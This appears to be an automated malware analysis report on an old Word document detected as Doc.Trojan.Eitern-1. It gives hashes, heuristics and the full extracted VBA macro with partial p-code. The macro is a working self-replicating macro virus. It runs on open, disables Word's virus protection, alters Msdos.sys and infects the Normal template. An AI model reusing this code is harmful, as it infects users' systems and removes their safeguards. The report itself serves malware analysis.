Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b193ac0c29b97592…

MALICIOUS

Office (OLE)

Size: 27.0 KB
Created: 1999-06-10 06:20:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: c69afd781a4ebde30b2bcdc5bb46d78e
SHA-1: 8f83497e59ff0645c2d2fe0bf9999a6144217769
SHA-256: b193ac0c29b975926a4887879026b1d71fbf4d8705570ff7be4666fceb7128b3
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro that runs automatically when the document is opened, which is a strong indicator of malicious intent. The macro writes its own source code to 'C:\Eitern.inf' and then likely executes it. The ClamAV detection 'Doc.Trojan.Eitern-1' further supports the malicious classification. The macro's obfuscation and self-modification suggest downloader or dropper functionality.

Heuristics (3)

  • ClamAV: Doc.Trojan.Eitern-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Eitern-1
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4872 bytes
SHA-256: fab1f3df9a7c28c3bebd24daebe550646d320459e8da9d26066fc65ddd28e54a
Detection: ClamAV: Doc.Trojan.Eitern-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Open "C:\Eitern.inf" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
I = (MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(8, 1))
For X = 2 To Len(I): B$ = Asc(Mid(I, X, 1)) - 1: C$ = C$ & Chr(B$): Next X: A = C$
MacroContainer.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 1, "Private Sub Document_Close()"
MacroContainer.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 8, A
MacroContainer.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 2, 6
'Po!Fssps!Sftvnf!Ofyu;!Pqujpot/DpogjsnDpowfstjpot!>!)1!.!1*;!Pqujpot/TbwfOpsnbmQspnqu!>!)2!.!2*;!Pqujpot/WjsvtQspufdujpo!>!)3!.!3*;!DpnnboeCbst)#Uppmt#*/Dpouspmt)#Nbdsp#*/Efmfuf  Jg!Ebz)2*!Uifo;!TfuBuus!#D;]Ntept/tzt#-!wcOpsnbm;!Tztufn/QsjwbufQspgjmfTusjoh)#D;]Ntept/tzt#-!#Pqujpot#-!#CppuHVJ#*!>!#1#;!TfuBuus!#D;]Ntept/tzt#-!wcTztufn!,!wcIjeefo!,!wcSfbePomz  OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/EfmfufMjoft!2-!OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/DpvouPgMjoft;!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/EfmfufMjoft!2-!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/DpvouPgMjoft  OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Fjufso/jog#*;!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Fjufso/jog#*;!BdujwfEpdvnfou/TbwfBt!GjmfObnf!>!BdujwfEpdvnfou/GvmmObnf
End Sub

' Processing file: /opt/analyzer/scan_staging/23d79a50e4854923aa7124ab16b8b830.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3205 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	LitStr 0x000D "C:\Eitern.inf"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	PrintItemNL 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #2:
' 	LitDI2 0x0008 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St I 
' Line #3:
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	Ld I 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld I 
' 	Ld X 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	St B$ 
' 	BoS 0x0000 
' 	Ld C$ 
' 	Ld B$ 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St C$ 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	Ld C$ 
' 	St A 
' Line #4:
' 	LitDI2 0x0001 
' 	LitStr 0x001C "Private Sub Document_Close()"
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #5:
' 	LitDI2 0x0008 
' 	Ld A 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall ReplaceLine 0x0002 
' Line #6:
' 	LitDI2 0x0002 
' 	LitDI2 0x0006 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #7:
' 	QuoteRem 0x0000 0x036D "Po!Fssps!Sftvnf!Ofyu;!Pqujpot/DpogjsnDpowfstjpot!>!)1!.!1*;!Pqujpot/TbwfOpsnbmQspnqu!>!)2!.!2*;!Pqujpot/WjsvtQspufdujpo!>!)3!.!3*;!D
... (truncated)